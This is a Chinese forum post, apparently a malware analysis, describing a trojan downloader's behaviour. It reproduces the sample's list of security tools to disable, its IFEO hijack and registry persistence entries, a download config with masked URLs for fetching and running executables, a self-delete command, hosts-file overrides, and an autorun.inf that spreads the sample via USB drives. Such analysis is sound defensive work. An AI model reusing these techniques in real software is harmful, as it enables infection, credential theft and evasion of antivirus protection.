pioneer
超级版主
积分 4563
发帖 4545
注册 2007-7-16
来自 BJ
|
#2
病毒分析
该样本程序被执行后,遍历以下进程:
| Quote: | AgentSvr.exe
AppSvc32.exe
auto.exe
AutoRun.exe
autoruns.exe
avgrssvc.exe
AvMonitor.exe
avp.com
avp.exe
CCenter.exe
ccSvcHst.exe
cross.exe
enc98.EXE
FileDsty.exe
FTCleanerShell.exe
guangd.exe
HijackThis.exe
IceSword.exe
iparmo.exe
Iparmor.exe
isPwdSvc.exe
kabaload.exe
KaScrScn.SCR
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPFW.exe
KAVSetup.exe
KAVStart.exe
KISLnchr.exe
KMailMon.exe
KMFilter.exe
KPFW32.exe
KPFW32X.exe
KPFWSvc.exe
KRegEx.exe
KRepair.COM
KsLoader.exe
KVCenter.kxp
KvDetect.exe
KvfwMcl.exe
KVMonXP.kxp
KVMonXP_1.kxp
kvol.exe
kvolself.exe
KvReport.kxp
KVSrvXP.exe
KVStub.kxp
kvupload.exe
kvwsc.exe
KvXP.kxp
KWatch.exe
KWatch9x.exe
KWatchX.exe
loaddll.exe
MagicSet.exe
mcconsol.exe
mmqczj.exe
mmsk.exe
NAVSetup.exe
nod32krn.exe
nod32kui.exe
PFW.exe
PFWLiveUpdate.exe
QHSET.exe
Ras.exe
Rav.exe
RavMon.exe
RavMonD.exe
RavStub.exe
RavTask.exe
RegClean.exe
rfwcfg.exe
RfwMain.exe
rfwProxy.exe
rfwsrv.exe
RsAgent.exe
Rsaupd.exe
runiep.exe
safelive.exe
scan32.exe
SDGames.exe
shcfg32.exe
ShuiNiu.exe
SmartUp.exe
sos.exe
SREng.exe
svch0st.exe
symlcsvc.exe
SysSafe.exe
Systom.exe
taskmgr.exe
TNT.Exe
TrojanDetector.exe
Trojanwall.exe
TrojDie.kxp
TxoMoU.Exe
ua80.EXE
UFO.exe
UIHost.exe
UmxAgent.exe
UmxAttachment.exe
UmxCfg.exe
UmxFwHlp.exe
UmxPol.exe
UpLive.EXE
WoptiClean.exe
XP.exe
zxsweep.exe
QQDoctor.exe
RStray.exe
360rpt.exe
360Safe.exe
360tray.exe
adam.exe |
|
将遍历到的进程分类处理,例如“AVP.exe”将采取调整系统日期使卡巴斯基过期的方式处理,“QQDoctor.exe”将采取利用命令行调用ntsd调试“QQDoctor.exe”,将“QQDoctor.exe”挂起的方式处理。
修改注册表“SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”,将遍历到的进程进行映像劫持,键值均为:debugger,数据均指向:svchost.exe。
复制自身至系统目录“%SystemRoot%\system32”重命名为“jjxzwzjy******.exe”,文件名最后六位为当前日期。
修改注册表,将“jjxzwzjy******.exe”注册为系统启动项:
| Quote: | 键:“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\run”
值:“dlmcjjcdfc”
数据:“C:\WINDOWS\system\jjxzwzjy******.exe” |
|
修改注册表,修改IE设置,禁用IE默认关联检查:
| Quote: | 键:“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\”
值:“Check_Associations”
数据:“no” |
|
修改注册表,修改系统设置,禁止显示隐藏文件:
| Quote: | 键:“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\”
值:“CheckedValue”
数据:“0” |
|
释放其动态库文件“jjxzajcj32dl.dll”至系统目录“%SystemRoot%\system32”,并申请内存将代码写入“iexplorer.exe”,启动一线程,发送数据至“http://www.a3***.com/mydown.asp”, “mydown.asp”返回数据将被保存至“%SystemRoot%”命名为“mydown.asp”, “mydown.asp”内容如下:
| Quote: | begin
1,090113,10241,http://www.***2223.cn/n**/shengji.exe,120,1,180,1,10000,16,0,1,1,1
7,
2,90113,34000,http://www.***2223.cn/n**/css.exe,10,0-24,,
2,90113,47000,http://www.***2223.cn/n**/ccc.exe,80,0-24,,
2,90113,148000,http://www.***2223.cn/n**/msn180.exe,10,0-24,,
3,127.0.0.1,js.tongji.cn.yahoo.com
3,127.0.0.1,img.tongji.cn.yahoo.com
end |
|
病毒将下载上述升级文件与病毒文件并执行,病毒文件中包含了木马下载器与盗号木马。
期间病毒将利用命令行实现自删除,命令行如下:
| Quote: | | cmd /c del "C:\Sample.exe " |
|
删除系统Host文件,“%SystemRoot%\system32\drivers\etc\hosts”,并创建新的Host文件,写入内容为:
| Quote: | 127.0.0.1 js.tongji.cn.yahoo.com
127.0.0.1 img.tongji.cn.yahoo.com |
|
系统重启动后“jjxzwzjy******.exe”,将遍历系统磁盘与可移动磁盘,在各磁盘根目录复制自身为“auto.exe”,创建“autorun.inf”,属性均修改为“隐藏”与“系统”,“autorun.inf”内容如下:
| Quote: | [AutoRun]
shell\open=打开(&O)
shell\open\Command= auto.exe
shell\open\Default=1
shell\explore=资源管理器(&X)
shell\explore\command=auto.exe |
|
| |
※文章所有权归【pioneer】与【东方微点论坛】共同所有,转载请注明出处!※
|
 |
|
